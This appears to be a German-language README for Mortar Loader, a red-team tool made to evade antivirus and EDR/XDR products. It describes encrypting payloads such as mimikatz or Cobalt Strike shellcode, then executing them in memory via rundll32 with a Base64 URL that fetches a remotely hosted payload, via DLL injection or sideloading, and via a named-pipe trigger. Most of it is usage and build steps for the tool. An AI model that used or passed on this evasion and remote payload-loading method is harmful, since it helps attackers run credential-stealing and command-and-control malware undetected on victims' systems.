
Ausweichtechnik zur Überwindung und Umleitung von Erkennungs- und Präventionsmaßnahmen von Sicherheitsprodukten (AV/EDR/XDR)
Red-Teaming-Evasion-Technik, um die Erkennung und Verhinderung von Sicherheitsprodukten zu umgehen und abzulenken. Mortar Loader führt die Ver- und Entschlüsselung von PE/Shellcode in den Speicherdatenströmen durch und führt ihn mithilfe verschiedener Injektionstechniken aus. Mortar ist in der Lage, moderne Antivirenprodukte und fortschrittliche XDR-Lösungen zu umgehen und wurde getestet und bestätigt für die folgenden:
Die neuere Version (v3) wurde mit den folgenden Funktionen veröffentlicht:
Eine technischere Beschreibung finden Sie im folgenden Blogbeitrag: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html
Der Encryptor verschlüsselt C-ShellCode und PE-Binärdateien und schreibt die Ausgabe in eine .enc-Datei. Sie können jedes beliebige Payload (MSF/Cobalt/Havoc usw.) verwenden, solange es die x64-Architektur hat und nicht RAW ist.
root@kali>./encryptor -f mimikatz.exe -o bin.enc
root@kali>./encryptor -f shellcode.c -o bin.enc
Die neuere Version nutzt mehrere Techniken in Kombination mit Remote-Payload-Abruf. Es wird empfohlen, den folgenden Blogbeitrag zu lesen, um weitere Einblicke zu erhalten.
Für Kurzanweisungen:
# PE Forking
1. Hosten Sie Ihre verschlüsselte Binärdatei auf einem entfernten Host.
2. Kodieren Sie die endgültige URL mit Base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. Die Covert Reload Subroutine-Technik ist aktiviert.
Derzeit wird die Early-Bird-Injektion in Kombination mit Named Pipes unterstützt, um Variablen für die endgültige Ausführung zu empfangen.
1. Injizieren Sie die Mortar-DLL in einen entfernten Prozess (DLL-Injektion, Hijacking, Sideloading).
2. Verbinden Sie sich mit der Named Pipe, um Ihre URL zu liefern.
echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs
3. Das Payload wird ausgeführt, sobald ein gültiger Wert empfangen wurde.
Das Projekt wurde mit FPC (Free Pascal) programmiert. Die Kompilierungsverfahren sind unkompliziert: Laden Sie die Lazarus IDE herunter und installieren Sie sie (https://www.lazarus-ide.org/index.php?page=downloads).
Für den Encryptor können Sie ihn aus dem Release-Bereich herunterladen oder einfach mit Lazarus IDE kompilieren.
#Debian & Ubuntu
apt install fpc
apt install lazarus-ide
Die Entwicklung von Mortar oder eines anderen geteilten Projekts ist das Ergebnis meiner persönlichen Zeit.